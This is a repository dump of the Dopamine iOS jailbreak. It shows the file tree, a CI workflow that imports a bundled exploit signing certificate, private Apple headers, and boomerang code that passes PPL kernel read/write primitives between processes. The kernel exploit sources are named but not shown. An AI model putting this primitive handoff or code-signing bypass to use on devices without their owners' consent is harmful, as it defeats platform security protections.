├── .github └── workflows │ ├── Dopamine.yml │ ├── Dopamine_prerelease.yml │ └── main.yml ├── .gitignore ├── BaseBin ├── .gitignore ├── _external │ ├── fallback │ │ └── CydiaSubstrate.framework │ │ │ ├── .this_is_ellekit_not_substrate │ │ │ └── CydiaSubstrate │ ├── opainject │ └── tar ├── _shared │ ├── CoreServices │ │ ├── LSApplicationProxy.h │ │ └── LSBundleProxy.h │ ├── CoreSymbolication.h │ ├── FSEvents.h │ ├── bsm │ │ ├── audit.h │ │ ├── audit_filter.h │ │ ├── audit_session.h │ │ ├── audit_uevents.h │ │ └── libbsm.h │ ├── kern_memorystatus.h │ ├── launch.h │ ├── libarchive │ │ ├── archive.h │ │ └── archive_entry.h │ ├── libellekit.tbd │ ├── libproc.h │ ├── libproc_private.h │ ├── sandbox.h │ ├── substrate.h │ └── xpc │ │ ├── XPC.apinotes │ │ ├── activity.h │ │ ├── availability.h │ │ ├── base.h │ │ ├── connection.h │ │ ├── debug.h │ │ ├── endpoint.h │ │ ├── module.modulemap │ │ ├── private.h │ │ ├── rich_error.h │ │ ├── session.h │ │ └── xpc.h ├── boomerang │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ └── main.m ├── clean.sh ├── forkfix │ ├── Makefile │ ├── src │ │ ├── litehook.c │ │ ├── litehook.h │ │ ├── main.c │ │ ├── syscall.S │ │ └── syscall.h │ └── upload.sh ├── idownloadd │ ├── Makefile │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── idownloadd.xcodeproj │ │ ├── project.pbxproj │ │ └── project.xcworkspace │ │ │ ├── contents.xcworkspacedata │ │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ │ └── idownloadd │ │ ├── iDownloadCmds.swift │ │ ├── iDownloadKRW.swift │ │ ├── idownloadd-Bridging-Header.h │ │ └── main.swift ├── jailbreakd │ ├── Makefile │ ├── README.md │ ├── daemon.plist │ ├── entitlements.plist │ └── src │ │ ├── JBDTCPage.h │ │ ├── JBDTCPage.m │ │ ├── codesign.h │ │ ├── codesign.m │ │ ├── dyld_patch.h │ │ ├── dyld_patch.m │ │ ├── fakelib.h │ │ ├── fakelib.m │ │ ├── forkfix.h │ │ ├── forkfix.m │ │ ├── server.h │ │ ├── server.m │ │ ├── spawn_wrapper.h │ │ ├── spawn_wrapper.m │ │ ├── trustcache.h │ │ ├── trustcache.m │ │ ├── trustcache_structs.h │ │ ├── update.h │ │ └── update.m ├── jbctl │ ├── Makefile │ ├── entitlements.plist │ ├── rebuild_daemon.plist │ └── src │ │ └── main.m ├── jbinit │ ├── Makefile │ ├── entitlements.plist │ └── src │ │ ├── launchctl.h │ │ ├── launchctl.m │ │ └── main.m ├── launchdhook │ ├── Makefile │ └── src │ │ ├── boomerang.h │ │ ├── boomerang.m │ │ ├── crashreporter.h │ │ ├── crashreporter.m │ │ ├── daemon_hook.h │ │ ├── daemon_hook.m │ │ ├── dsc_hook.h │ │ ├── dsc_hook.m │ │ ├── ipc_hook.h │ │ ├── ipc_hook.m │ │ ├── main.m │ │ ├── spawn_hook.h │ │ ├── spawn_hook.m │ │ ├── xpc_hook.h │ │ └── xpc_hook.m ├── libfilecom │ ├── Makefile │ └── src │ │ ├── FCHandler.h │ │ └── FCHandler.m ├── libintl.8.dylib ├── libjailbreak │ ├── Makefile │ └── src │ │ ├── boot_info.h │ │ ├── boot_info.m │ │ ├── csblob.h │ │ ├── handoff.h │ │ ├── handoff.m │ │ ├── jailbreakd.h │ │ ├── jailbreakd.m │ │ ├── kcall.h │ │ ├── kcall.m │ │ ├── launchd.h │ │ ├── launchd.m │ │ ├── libjailbreak.h │ │ ├── log.c │ │ ├── log.h │ │ ├── macho.h │ │ ├── macho.m │ │ ├── pac.S │ │ ├── patchfind.h │ │ ├── patchfind.m │ │ ├── pplrw.h │ │ ├── pplrw.m │ │ ├── pte.h │ │ ├── signatures.h │ │ ├── signatures.m │ │ ├── util.h │ │ └── util.m ├── pack.sh ├── rootlesshooks │ ├── .gitignore │ ├── Makefile │ ├── cfprefsd.x │ ├── installd.x │ └── main.x ├── systemhook │ ├── Makefile │ ├── src │ │ ├── common.c │ │ ├── common.h │ │ ├── envbuf.c │ │ ├── envbuf.h │ │ ├── launchd.h │ │ └── main.c │ └── upload.sh ├── tar └── watchdoghook │ ├── Makefile │ └── src │ └── main.m ├── Dopamine ├── .gitignore ├── Dopamine.xcodeproj │ ├── project.pbxproj │ ├── project.xcworkspace │ │ ├── contents.xcworkspacedata │ │ └── xcshareddata │ │ │ ├── IDEWorkspaceChecks.plist │ │ │ └── swiftpm │ │ │ └── Package.resolved │ └── xcshareddata │ │ └── xcschemes │ │ └── Dopamine.xcscheme ├── Dopamine │ ├── Assets.xcassets │ │ ├── AccentColor.colorset │ │ │ └── Contents.json │ │ ├── AppIcon.appiconset │ │ │ ├── 100.png │ │ │ ├── 1024.png │ │ │ ├── 114.png │ │ │ ├── 120.png │ │ │ ├── 144.png │ │ │ ├── 152.png │ │ │ ├── 167.png │ │ │ ├── 180.png │ │ │ ├── 20.png │ │ │ ├── 29.png │ │ │ ├── 40.png │ │ │ ├── 50.png │ │ │ ├── 57.png │ │ │ ├── 58.png │ │ │ ├── 60.png │ │ │ ├── 72.png │ │ │ ├── 76.png │ │ │ ├── 80.png │ │ │ ├── 87.png │ │ │ └── Contents.json │ │ ├── Backgrounds │ │ │ ├── Clouds.imageset │ │ │ │ ├── Clouds@3x.jpg │ │ │ │ └── Contents.json │ │ │ ├── Contents.json │ │ │ └── Wallpaper.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── pexels-soubhagya-maharana-4124435.jpg │ │ ├── Contents.json │ │ ├── Easter Eggs │ │ │ ├── Contents.json │ │ │ └── fr.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── fr.png │ │ ├── Logos │ │ │ ├── Contents.json │ │ │ ├── DopamineLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── DopamineLogo2.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── DopamineLogo@1x.png │ │ │ │ ├── DopamineLogo@2x.png │ │ │ │ └── DopamineLogo@3x.png │ │ │ ├── FuguTransparent.imageset │ │ │ │ ├── Artboard copy 2.png │ │ │ │ ├── Artboard copy.png │ │ │ │ ├── Artboard.png │ │ │ │ └── Contents.json │ │ │ ├── PinautenLogo.imageset │ │ │ │ ├── Contents.json │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy 2.png │ │ │ │ ├── Pinauten_Logo_SecResearch_4096 copy.png │ │ │ │ └── Pinauten_Logo_SecResearch_4096.png │ │ │ ├── discord.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── discord-mark-white.png │ │ │ └── github.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── GitHub-Mark-64px.png │ │ ├── Package Managers │ │ │ ├── Contents.json │ │ │ ├── Sileo.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Sileo.png │ │ │ └── Zebra.imageset │ │ │ │ ├── Contents.json │ │ │ │ └── Zebra.png │ │ ├── Pinauten_Logo_SecResearch_1024.png │ │ ├── Pinauten_Logo_SecResearch_2048.png │ │ └── Pinauten_Logo_SecResearch_4096.png │ ├── Dopamine-Bridging-Header.h │ ├── Dopamine.entitlements │ ├── DopamineApp.swift │ ├── Info.plist │ ├── JailbreakView.swift │ ├── Preview Content │ │ └── Preview Assets.xcassets │ │ │ └── Contents.json │ ├── UI │ │ ├── Classes │ │ │ └── Logger.swift │ │ ├── Extensions │ │ │ ├── Error++.swift │ │ │ ├── TextField++.swift │ │ │ └── URLExtension+download.swift │ │ └── Views │ │ │ ├── AboutView.swift │ │ │ ├── Jailbreak.swift │ │ │ ├── JailbreakView.swift │ │ │ ├── LogView.swift │ │ │ ├── MaterialView.swift │ │ │ ├── PackageManagerSelectionView.swift │ │ │ ├── PopupView.swift │ │ │ ├── SettingsView.swift │ │ │ └── UpdateDownloadingView.swift │ ├── bootstrap │ │ ├── bootstrap-iphoneos-arm64.tar.zst │ │ ├── ellekit_1.0_iphoneos-arm64.deb │ │ ├── libjbdrw.deb │ │ ├── preferenceloader_2.2.6-1_iphoneos-arm64.deb │ │ ├── sileo.deb │ │ ├── xinamine_1.0.6_iphoneos-arm64.deb │ │ └── zebra.deb │ ├── constants.h │ ├── constants.m │ ├── include │ │ ├── LSApplicationProxy.h │ │ ├── LSApplicationWorkspace.h │ │ ├── LSBundleProxy.h │ │ ├── _LSApplicationState.h │ │ └── posix_spawn.h │ └── main.swift ├── Makefile ├── ar.lproj │ └── Localizable.strings ├── da.lproj │ └── Localizable.strings ├── de.lproj │ └── Localizable.strings ├── el.lproj │ └── Localizable.strings ├── en.lproj │ └── Localizable.strings ├── fil.lproj │ └── Localizable.strings ├── fr.lproj │ └── Localizable.strings ├── it.lproj │ └── Localizable.strings ├── ja.lproj │ └── Localizable.strings ├── kk.lproj │ └── Localizable.strings ├── ko.lproj │ └── Localizable.strings ├── localization_keys.sh ├── nl.lproj │ └── Localizable.strings ├── pl.lproj │ └── Localizable.strings ├── pt-BR.lproj │ └── Localizable.strings ├── ru.lproj │ └── Localizable.strings ├── sort_localizations.sh ├── sv.lproj │ └── Localizable.strings ├── tr.lproj │ └── Localizable.strings ├── uk.lproj │ └── Localizable.strings ├── ur.lproj │ └── Localizable.strings ├── vi.lproj │ └── Localizable.strings ├── zh-Hans.lproj │ └── Localizable.strings ├── zh_CN.lproj │ └── Localizable.strings ├── zh_HK.lproj │ └── Localizable.strings └── zh_TW.lproj │ └── Localizable.strings ├── Exploits ├── fastPath │ ├── arm.pfx │ ├── ca.conf │ ├── clean.sh │ ├── genCrt.sh │ ├── itd.conf │ ├── usr_arm.conf │ ├── usr_x86_64.conf │ └── x86_64.pfx └── oobPCI │ ├── .gitignore │ ├── Makefile │ ├── Sources │ ├── DriverKit.c │ ├── DriverKit.h │ ├── DriverKitClasses.h │ ├── Fugu15KRW.h │ ├── asm.S │ ├── badRecovery.c │ ├── badRecovery.h │ ├── device.defs │ ├── generated │ │ ├── device.c │ │ ├── device.h │ │ ├── mach_host.c │ │ ├── mach_host.h │ │ ├── task.c │ │ ├── task.h │ │ ├── thread.c │ │ └── thread.h │ ├── includeme.h │ ├── kernel.c │ ├── kernel.h │ ├── kernrw_alloc.c │ ├── kernrw_alloc.h │ ├── mach.c │ ├── mach_host.defs │ ├── main.c │ ├── misc.c │ ├── offsets.c │ ├── offsets.h │ ├── oobPCI.c │ ├── oobPCI.h │ ├── physrw.c │ ├── physrw.h │ ├── print.c │ ├── sleep.c │ ├── sleep.h │ ├── task.defs │ ├── thread.defs │ ├── tlbFail.c │ ├── tlbFail.h │ ├── virtrw.c │ ├── virtrw.h │ └── xprr.h │ └── oobPCI.entitlements ├── LICENSE.md ├── LICENSE_Fugu15.md ├── LICENSE_libc.md ├── Makefile ├── Packages ├── Fugu15KernelExploit │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ │ ├── CBindings │ │ ├── fcntl.m │ │ ├── include │ │ │ ├── CBindings.h │ │ │ ├── libjailbreak.h │ │ │ ├── posix_spawn.h │ │ │ ├── th_state.h │ │ │ ├── wifi.h │ │ │ ├── zdict.h │ │ │ ├── zstd.h │ │ │ └── zstd_errors.h │ │ ├── launch.h │ │ ├── libjailbreak.m │ │ ├── pci_offset.m │ │ ├── th_state.c │ │ ├── wifi.m │ │ ├── xpc │ │ │ ├── XPC.apinotes │ │ │ ├── activity.h │ │ │ ├── availability.h │ │ │ ├── base.h │ │ │ ├── connection.h │ │ │ ├── debug.h │ │ │ ├── endpoint.h │ │ │ ├── module.modulemap │ │ │ └── xpc.h │ │ └── zstd_wrapper.m │ │ └── Fugu15KernelExploit │ │ ├── Bootstrapper.swift │ │ ├── Fugu15.swift │ │ ├── KRWHandler.swift │ │ ├── Logger.swift │ │ ├── SpawnDrv │ │ ├── SpawnDrv.swift │ │ └── tp.swift │ │ ├── Util.swift │ │ ├── codelessKext.swift │ │ └── oobPCI.swift └── ProcessCommunication │ ├── .gitignore │ ├── Package.swift │ ├── README.md │ └── Sources │ └── ProcessCommunication │ └── ProcessCommunication.swift ├── README.md ├── Tools ├── Exe2Driver │ ├── .gitignore │ ├── Exe2Driver │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ └── Sources │ │ └── Exe2Driver │ │ └── main.swift ├── Makefile ├── Makefile.inc ├── fastPathSign │ ├── .gitignore │ ├── Makefile │ ├── Package.swift │ ├── README.md │ ├── Sources │ │ ├── Security_Codesign │ │ │ ├── SecCodeSigner.h │ │ │ └── module.modulemap │ │ └── fastPathSign │ │ │ └── main.swift │ └── fastPathSign └── installHaxx │ ├── .gitignore │ ├── Makefile │ ├── Package.resolved │ ├── Package.swift │ ├── README.md │ ├── Sources │ └── installHaxx │ │ └── main.swift │ └── installHaxx ├── jbupdate.sh ├── release.md └── release_history.md /.github/workflows/main.yml: -------------------------------------------------------------------------------- 1 | name: "Dopamine: build and upload" 2 | 3 | on: 4 | push: 5 | branches: 6 | - main 7 | paths-ignore: 8 | - ".gitignore" 9 | pull_request: 10 | branches: 11 | - main 12 | paths-ignore: 13 | - ".gitignore" 14 | workflow_dispatch: 15 | schedule: 16 | - cron: '0 0 1 1 *' 17 | - cron: '0 0 1 4 *' 18 | - cron: '0 0 30 6 *' 19 | - cron: '0 0 28 9 *' 20 | - cron: '0 0 27 12 *' 21 | 22 | concurrency: 23 | group: ${{ github.workflow }}-${{ github.ref }} 24 | cancel-in-progress: true 25 | 26 | jobs: 27 | build: 28 | runs-on: macos-13 29 | steps: 30 | - name: Checkout 31 | uses: actions/checkout@v3 32 | 33 | - name: Install Procursus 34 | uses: dhinakg/procursus-action@main 35 | with: 36 | packages: ldid findutils sed coreutils make 37 | 38 | - name: Install THEOS (without SDKs) 39 | run: | 40 | set -x 41 | export BASEDIR="$(pwd)" 42 | export THEOS="${BASEDIR}/theos" 43 | mkdir -p $THEOS 44 | curl -fsSL https://raw.githubusercontent.com/theos/theos/master/bin/install-theos >> install-theos.sh 45 | gsed -E "/^\s*get_theos\s*$/,+1 s/^(\s*)(get_sdks)\s*$/\1mkdir -p \${THEOS}\/sdks\n\1touch \${THEOS}\/sdks\/sdk\n\1\2/g" -i install-theos.sh 46 | bash install-theos.sh 47 | cd $BASEDIR 48 | 49 | - name: Build and Install trustcache 50 | run: | 51 | set -x 52 | git clone https://github.com/CRKatri/trustcache 53 | cd trustcache 54 | gmake -j$(sysctl -n hw.physicalcpu) OPENSSL=1 55 | sudo cp trustcache /opt/procursus/bin/ 56 | 57 | - name: Set Environment Variables 58 | run: | 59 | set -x 60 | T2=$(TZ=UTC-2 date +'%Y%m%d_%H%M%S') 61 | TS=$(date -j -f "%Y%m%d_%H%M%S" "${T2}" +%s) 62 | SHASH=$(git rev-parse --short HEAD) 63 | echo "ctime=${T2}" >> $GITHUB_ENV 64 | echo "ctimestamp=${TS}" >> $GITHUB_ENV 65 | echo "shorthash=${SHASH}" >> $GITHUB_ENV 66 | 67 | - name: Build 68 | run: | 69 | set -x 70 | sudo security import Exploits/fastPath/arm.pfx -k /Library/Keychains/System.keychain -P password -A 71 | export BASEDIR="$(pwd)" 72 | export THEOS="${BASEDIR}/theos" 73 | gmake -j$(sysctl -n hw.physicalcpu) 74 | cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa 75 | cp -a Dopamine/Dopamine.tipa Dopamine/Dopamine_Latest.tipa 76 | 77 | - name: Upload Latest Artifact 78 | id: dopamine-latest-upload 79 | uses: actions/upload-artifact@v3 80 | with: 81 | name: Dopamine_Latest 82 | path: | 83 | ${{ github.workspace }}/Dopamine/Dopamine_Latest.tipa 84 | - name: Upload Hashed Artifact 85 | id: dopamine-hashed-upload 86 | uses: actions/upload-artifact@v3 87 | with: 88 | name: Dopamine_${{ env.shorthash }}_${{ env.ctime }} 89 | path: | 90 | ${{ github.workspace }}/Dopamine/Dopamine_${{ env.shorthash }}_${{ env.ctime }}.tipa 91 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/ 7 | /Package.resolved 8 | /Server/orig.ipa 9 | /Server/serverCert/fullchain.cer 10 | /Server/serverCert/server.key 11 | Dopamine/Dopamine/bootstrap/tmp/ 12 | .idea 13 | Tools/fastPathSign/.build_* 14 | *.log 15 | .vscode 16 | Fugu15/ 17 | -------------------------------------------------------------------------------- /BaseBin/.gitignore: -------------------------------------------------------------------------------- 1 | basebin.tc 2 | libjailbreak/libjailbreak.dylib 3 | jailbreakd/jailbreakd 4 | jbinit/jbinit 5 | jbctl/jbctl 6 | launchdhook/launchdhook.dylib 7 | forkfix/forkfix.dylib 8 | systemhook/systemhook.dylib 9 | watchdoghook/watchdoghook.dylib 10 | libfilecom/libfilecom.dylib 11 | boomerang/boomerang 12 | idownloadd/idownloadd 13 | idownloadd/.build.xcarchive 14 | _shared/libjailbreak 15 | _shared/libfilecom 16 | .tmp -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/fallback/CydiaSubstrate.framework/.this_is_ellekit_not_substrate -------------------------------------------------------------------------------- /BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/fallback/CydiaSubstrate.framework/CydiaSubstrate -------------------------------------------------------------------------------- /BaseBin/_external/opainject: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/opainject -------------------------------------------------------------------------------- /BaseBin/_external/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/BaseBin/_external/tar -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSApplicationProxy.h: -------------------------------------------------------------------------------- 1 | #import "LSBundleProxy.h" 2 | @interface LSApplicationProxy : LSBundleProxy 3 | + (instancetype)applicationProxyForIdentifier:(NSString *)identifier; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/CoreServices/LSBundleProxy.h: -------------------------------------------------------------------------------- 1 | @interface LSBundleProxy : NSObject 2 | @property (nonatomic) NSURL *bundleURL; 3 | @property (nonatomic,readonly) NSString *bundleExecutable; 4 | @end -------------------------------------------------------------------------------- /BaseBin/_shared/libproc_private.h: -------------------------------------------------------------------------------- 1 | struct proc_bsdinfo { 2 | uint32_t pbi_flags; /* 64bit; emulated etc */ 3 | uint32_t pbi_status; 4 | uint32_t pbi_xstatus; 5 | uint32_t pbi_pid; 6 | uint32_t pbi_ppid; 7 | uid_t pbi_uid; 8 | gid_t pbi_gid; 9 | uid_t pbi_ruid; 10 | gid_t pbi_rgid; 11 | uid_t pbi_svuid; 12 | gid_t pbi_svgid; 13 | uint32_t rfu_1; /* reserved */ 14 | char pbi_comm[MAXCOMLEN]; 15 | char pbi_name[2 * MAXCOMLEN]; /* empty if no name is registered */ 16 | uint32_t pbi_nfiles; 17 | uint32_t pbi_pgid; 18 | uint32_t pbi_pjobc; 19 | uint32_t e_tdev; /* controlling tty dev */ 20 | uint32_t e_tpgid; /* tty process group id */ 21 | int32_t pbi_nice; 22 | uint64_t pbi_start_tvsec; 23 | uint64_t pbi_start_tvusec; 24 | }; 25 | 26 | #define PROC_PIDTBSDINFO 3 27 | #define PROC_PIDTBSDINFO_SIZE (sizeof(struct proc_bsdinfo)) -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/XPC.apinotes: -------------------------------------------------------------------------------- 1 | Name: XPC 2 | Functions: 3 | # xpc_object 4 | - Name: xpc_retain 5 | Availability: nonswift 6 | - Name: xpc_release 7 | Availability: nonswift 8 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/debug.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_DEBUG_H__ 2 | #define __XPC_DEBUG_H__ 3 | 4 | /*! 5 | * @function xpc_debugger_api_misuse_info 6 | * Returns a pointer to a string describing the reason XPC aborted the calling 7 | * process. On OS X, this will be the same string present in the "Application 8 | * Specific Information" section of the crash report. 9 | * 10 | * @result 11 | * A pointer to the human-readable string describing the reason the caller was 12 | * aborted. If XPC was not responsible for the program's termination, NULL will 13 | * be returned. 14 | * 15 | * @discussion 16 | * This function is only callable from within a debugger. It is not meant to be 17 | * called by the program directly. 18 | */ 19 | XPC_DEBUGGER_EXCL 20 | const char * 21 | xpc_debugger_api_misuse_info(void); 22 | 23 | #endif // __XPC_DEBUG_H__ 24 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_ENDPOINT_H__ 2 | #define __XPC_ENDPOINT_H__ 3 | 4 | /*! 5 | * @function xpc_endpoint_create 6 | * Creates a new endpoint from a connection that is suitable for embedding into 7 | * messages. 8 | * 9 | * @param connection 10 | * Only connections obtained through calls to xpc_connection_create*() may be 11 | * given to this API. Passing any other type of connection is not supported and 12 | * will result in undefined behavior. 13 | * 14 | * @result 15 | * A new endpoint object. 16 | */ 17 | __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) 18 | XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1 19 | xpc_endpoint_t _Nonnull 20 | xpc_endpoint_create(xpc_connection_t _Nonnull connection); 21 | 22 | #endif // __XPC_ENDPOINT_H__ 23 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/module.modulemap: -------------------------------------------------------------------------------- 1 | module XPC [system] [extern_c] { 2 | header "xpc.h" 3 | header "availability.h" 4 | header "base.h" 5 | header "activity.h" 6 | header "connection.h" 7 | header "debug.h" 8 | header "endpoint.h" 9 | export * 10 | } 11 | -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/private.h: -------------------------------------------------------------------------------- 1 | void xpc_dictionary_get_audit_token(xpc_object_t xdict, audit_token_t *token); 2 | char *xpc_strerror (int); 3 | 4 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_pipe_create_from_port(mach_port_t port, uint32_t flags); 5 | extern int xpc_pipe_simpleroutine(xpc_object_t pipe, xpc_object_t message); 6 | extern int xpc_pipe_routine(xpc_object_t pipe, xpc_object_t message, XPC_GIVES_REFERENCE xpc_object_t *reply); 7 | extern int xpc_pipe_routine_with_flags(xpc_object_t xpc_pipe, xpc_object_t inDict, XPC_GIVES_REFERENCE xpc_object_t *reply, uint32_t flags); 8 | extern int xpc_pipe_routine_reply(xpc_object_t reply); 9 | extern int xpc_pipe_receive(mach_port_t port, XPC_GIVES_REFERENCE xpc_object_t *message); 10 | 11 | extern XPC_RETURNS_RETAINED xpc_object_t xpc_copy_entitlement_for_token(const char *, audit_token_t *); -------------------------------------------------------------------------------- /BaseBin/_shared/xpc/rich_error.h: -------------------------------------------------------------------------------- 1 | #ifndef __XPC_RICH_ERROR_H__ 2 | #define __XPC_RICH_ERROR_H__ 3 | 4 | #ifndef __XPC_INDIRECT__ 5 | #error "Please #include instead of this file directly." 6 | // For HeaderDoc. 7 | #include 8 | #endif // __XPC_INDIRECT__ 9 | 10 | #ifndef __BLOCKS__ 11 | #error "XPC Rich Errors require Blocks support." 12 | #endif // __BLOCKS__ 13 | 14 | XPC_ASSUME_NONNULL_BEGIN 15 | __BEGIN_DECLS 16 | 17 | #pragma mark Properties 18 | /*! 19 | * @function xpc_rich_error_copy_description 20 | * Copy the string description of an error. 21 | * 22 | * @param error 23 | * The error to be examined. 24 | * 25 | * @result 26 | * The underlying C string for the provided error. This string should be 27 | * disposed of with free(3) when done. 28 | * 29 | * This will return NULL if a string description could not be generated. 30 | */ 31 | XPC_EXPORT XPC_WARN_RESULT 32 | char * _Nullable 33 | xpc_rich_error_copy_description(xpc_rich_error_t error); 34 | 35 | /*! 36 | * @function xpc_rich_error_can_retry 37 | * Whether the operation the error originated from can be retried. 38 | * 39 | * @param error 40 | * The error to be inspected. 41 | * 42 | * @result 43 | * Whether the operation the error originated from can be retried. 44 | */ 45 | XPC_EXPORT XPC_WARN_RESULT 46 | bool 47 | xpc_rich_error_can_retry(xpc_rich_error_t error); 48 | 49 | __END_DECLS 50 | XPC_ASSUME_NONNULL_END 51 | 52 | #endif // __XPC_RICH_ERROR_H__ 53 | -------------------------------------------------------------------------------- /BaseBin/boomerang/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = boomerang 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -O2 6 | LDFLAGS = -L../libjailbreak -ljailbreak -L../libfilecom -lfilecom 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | install_name_tool -change "/var/jb/basebin/libfilecom.dylib" "@loader_path/libfilecom.dylib" $@ 15 | 16 | clean: 17 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/boomerang/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /BaseBin/boomerang/src/main.m: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #import 4 | #import 5 | #import 6 | #import 7 | 8 | FCHandler *gHandler; 9 | 10 | int launchdInitPPLRW(void) 11 | { 12 | xpc_object_t msg = xpc_dictionary_create_empty(); 13 | xpc_dictionary_set_bool(msg, "jailbreak", true); 14 | xpc_dictionary_set_uint64(msg, "id", LAUNCHD_JB_MSG_ID_GET_PPLRW); 15 | xpc_object_t reply = launchd_xpc_send_message(msg); 16 | 17 | int error = xpc_dictionary_get_int64(reply, "error"); 18 | if (error == 0) { 19 | initPPLPrimitives(); 20 | return 0; 21 | } 22 | else { 23 | return error; 24 | } 25 | } 26 | 27 | void getPrimitives(void) 28 | { 29 | dispatch_semaphore_t sema = dispatch_semaphore_create(0); 30 | // Receive PPLRW 31 | gHandler.receiveHandler = ^(NSDictionary *message) 32 | { 33 | NSString *identifier = message[@"id"]; 34 | if (identifier) { 35 | if ([identifier isEqualToString:@"receivePPLRW"]) 36 | { 37 | initPPLPrimitives(); 38 | dispatch_semaphore_signal(sema); 39 | } 40 | } 41 | }; 42 | [gHandler sendMessage:@{ @"id" : @"getPPLRW", @"pid" : @(getpid()) }]; 43 | 44 | dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER); 45 | 46 | recoverPACPrimitives(); 47 | 48 | // Tell launchd we're done, this will trigger the userspace reboot (that this process should survive) 49 | [gHandler sendMessage:@{ @"id" : @"primitivesInitialized" }]; 50 | } 51 | 52 | void sendPrimitives(void) 53 | { 54 | dispatch_semaphore_t sema = dispatch_semaphore_create(0); 55 | gHandler.receiveHandler = ^(NSDictionary *message) { 56 | NSString *identifier = message[@"id"]; 57 | if (identifier) { 58 | if ([identifier isEqualToString:@"getPPLRW"]) { 59 | int ret = handoffPPLPrimitives(1); 60 | [gHandler sendMessage:@{@"id" : @"receivePPLRW", @"errorCode" : @(ret), @"boomerangPid" : @(getpid())}]; 61 | } 62 | else if ([identifier isEqualToString:@"signThreadState"]) { 63 | uint64_t actContextKptr = [(NSNumber*)message[@"actContext"] unsignedLongLongValue]; 64 | signState(actContextKptr); 65 | [gHandler sendMessage:@{@"id" : @"signedThreadState"}]; 66 | } 67 | else if ([identifier isEqualToString:@"primitivesInitialized"]) 68 | { 69 | dispatch_semaphore_signal(sema); // DONE, exit 70 | } 71 | } 72 | }; 73 | dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER); 74 | } 75 | 76 | int main(int argc, char* argv[]) 77 | { 78 | setsid(); 79 | gHandler = [[FCHandler alloc] initWithReceiveFilePath:prebootPath(@"basebin/.communication/launchd_to_boomerang") sendFilePath:prebootPath(@"basebin/.communication/boomerang_to_launchd")]; 80 | getPrimitives(); 81 | sendPrimitives(); 82 | return 0; 83 | } -------------------------------------------------------------------------------- /BaseBin/clean.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | PREV_DIR=$(pwd) 6 | PACK_DIR=$(dirname -- "$0") 7 | cd "$PACK_DIR" 8 | 9 | # libfilecom 10 | cd "libfilecom" 11 | make clean 12 | cd - 13 | 14 | # libjailbreak 15 | cd "libjailbreak" 16 | make clean 17 | cd - 18 | 19 | # jailbreakd 20 | cd "jailbreakd" 21 | make clean 22 | cd - 23 | 24 | # jailbreakd 25 | cd "idownloadd" 26 | make clean 27 | cd - 28 | 29 | # boomerang 30 | cd "boomerang" 31 | make clean 32 | cd - 33 | 34 | # jbinit 35 | cd "jbinit" 36 | make clean 37 | cd - 38 | 39 | # jbctl 40 | 